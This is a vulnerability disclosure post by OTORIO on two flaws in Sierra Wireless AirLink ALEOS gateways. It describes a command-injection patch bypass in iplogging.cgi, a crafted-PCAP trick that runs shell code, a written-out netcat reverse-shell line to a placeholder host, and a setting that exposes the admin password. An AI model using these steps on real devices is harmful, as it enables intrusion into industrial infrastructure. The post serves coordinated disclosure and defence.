By OTORIO's Research Team

OTORIO researchers recently uncovered two vulnerabilities that affect multiple models of wireless IIoT devices made by Sierra Wireless, a Semtech company (NASDAQ: SMTC) and leading vendor of critical infrastructure connectivity. OTORIO researchers discovered vulnerabilities that leave the devices at risk for remote code execution exploits. These new vulnerabilities are part of OTORIO’s wireless IIoT attack surface analysis research that security researcher Roni Gavrilov will present at the upcoming S4x23 conference on February 15, 2023, in Miami.

The Sierra Wireless AirLink family of wireless gateways and modems offers customers solutions for various industrial, enterprise, and in-vehicle applications.

Vulnerabilities identified by OTORIO are present in the following AirLink products running the ALEOS operation system:

• ALEOS software releases prior to and including version 4.9.7 (ES450, GX450)
• ALEOS software releases prior to version 4.16.0 (MP70, RV50, RV50x, RV55, LX40, LX60).
  
  

Sierra Wireless and ICS-CERT (CISA) issued advisories regarding the vulnerabilities.

Details: Sierra Wireless AirLink IIoT Vulnerabilities

CVE-2022-46649 - Remote Code Execution

A user with valid ACEManager credentials and access to the ACEManager interface can manipulate the IP-logging operation to execute arbitrary shell commands on the device.

CVSS v3.1 score: 8.0 (AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

A vulnerability in the ACEManager web service allows for command injection through improper handling of the “-z” flag (responsible for providing a postrotate-command to tcpdump) in requests made to /cgi-bin/iplogging.cgi.

This vulnerability is based on a bypass for a patch released by Sierra Wireless in April 2019, addressing the CVE-2018-4061 reported by Talos.

The patch for the original vulnerability addressed the “-z” flag of tcpdump command, supported in the web interface of ACEManager.

Filtering logic for unsafe parameter in iplogging.cgi

As you can see in the screenshot above, the regular expression will remove any “-z” flag (representing the postrotate-command), as long as there is a space, tab, form feed, or vertical tab after it, as in "tcpdump -z reboot," which was previously used to exploit the same interface on CVE-2018-4061.

However, this check needs to be revised since it is possible to add the command without any spacing. For example, “-zreboot” easily bypasses the nearly 3-year-old patch for the previously discovered CVE.

Sending the following POST request will successfully reboot the device:

iplogging.cgi POST request rebooting the device

Executing an arbitrary binary on the system shows a problem that should be addressed. But still, without any additional work, this vulnerability may allow only limited command execution on the target machine.

Inspecting the tcpdump source code, it executes -z binary using: `execlp(any_binary, filename)`. In our case, the filename is hardcoded to "/tmp/iplogging.pcap", which limits us to the existing binaries on the machine and doesn’t allow any user-controlled parameters. As a result, it adds another layer of complexity to achieve a remote shell on the machine. 

tcpdump execution of the post-rotate command

To bypass this limitation, we found a workaround by inserting crafted data into the "/tmp/iplogging.pcap" file, making the file both a valid PCAP and a valid shell script, along with “sh” as the post-rotation command.

Data can be inserted into the target PCAP file by transmitting it directly to the appropriate interface. However, as other communication on the interface may cause issues, an alternative solution is to use the "/cgi-bin/iplogging_upload.cgi" page.

Here is how it was done:

1. Creating a malicious PCAP: The file must: a) pass tcpdump's validation, b) be a valid and functional shell script, and c) be large enough to trigger tcpdump's rotation logic (over 1MB). Luckily, /bin/sh will skip invalid lines as long as they do not contain special characters, making it definitely feasible. The file was successfully generated using “scapy” while making sure to add the sh commands between newlines, avoiding nulls, including some random data to reach 1 MB, and converting to PCAPNG format at the end.
   
   
2. Uploading the malicious PCAP: By using  "iplogging_upload.cgi," we can upload our malicious PCAP file, which will be saved to the fixed path: "/tmp/iplogging_params.tcp".
   
   

   
   iplogging_upload.cgi POST request

3. Executing the tcpdump command: We used the "iplogging.cgi" page to execute the tcpdump command with the following flags:
   
   
   1. "-r /tmp/iplogging_params.tcp": Causes tcpdump to read the incoming traffic from our malicious PCAP file instead of the ethernet interface.
      
      
   2. "-w /tmp/iplogging.pcap": Added automatically by the ACEManager, indicates tcpdump to write the incoming traffic (our PCAP file) to the predefined file, which is not in our control.
      
      
   3. "-zsh": Set the "post rotate command" as sh. It causes /bin/sh to be executed with "/tmp/iplogging.pcap" as a parameter every time the PCAP rotation occurs.
      
      
   4. "-C 1": Defines a rotation to be done every 1MB of traffic.

iplogging.cgi POST request

At this phase, the tcpdump program reads our crafted PCAP file (“/tmp/iplogging_params.tcp”) and writes it to the predefined output file (“/tmp/iplogging.pcap”). Once the first MB of data is reached, it will execute /bin/sh with a single parameter, which is a 1MB file containing the data from our crafted PCAP, now stored in “/tmp/iplogging.pcap.” /bin/sh will evaluate the file line by line, ignoring the PCAP header as "bad lines" and continue to our reverse-shell command, embedded as a separate line: ‘nohup nc {IP} {PORT} -e /bin/sh &’.

Reverse shell on Airlink device

CVE-2022-46650 - Exposure of Sensitive Information

A user with valid ACEManager credentials and access to the ACEManager interface can reconfigure the device to expose the ACEManager credentials on the pre-login status page. This leads to a persistent backdoor to the system and cleartext exposure of the admin password.
CVSS v3.1 score: 4.5  (AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)

The Embedded_Ace_Set_Task.cgi executable allows for the modification of configuration values within the configuration manager. An attacker could exploit this by enabling the “Device Status Screen“ configuration parameter (55052) and adding the password parameter (5003) to the list of parameters displayed on the pre-login page(55053).

Embedded_Ace_Set_Task.cgi POST request

As a result, the password becomes visible on the pre-login page:

Pre-login page with admin password exposed

Mitigation

OTORIO responsibly disclosed these vulnerabilities to Sierra Wireless and CISA.  Both organizations’ corresponding advisories can be found here:

• SWI-PSA-2023-001: AirLink - ALEOS Security Advisory
• CISA ICS Advisory (ICSA-23-026-04)

Sierra Wireless released updated firmware to address these vulnerabilities. Users are urged to update their devices, restrict access to the web interface, and implement strong credentials. Devices exposed to the WAN are particularly at risk, and immediate action is recommended to mitigate this risk.

We appreciate the professional manner in which Sierra Wireless disclosed the vulnerabilities and the coordination of the U.S. Cybersecurity and Infrastructure Security Agency (CISA).

________________

Concerned about vulnerabilities in your critical infrastructure or industrial manufacturing operational environment? Contact OTORIO's OT security experts for professional help.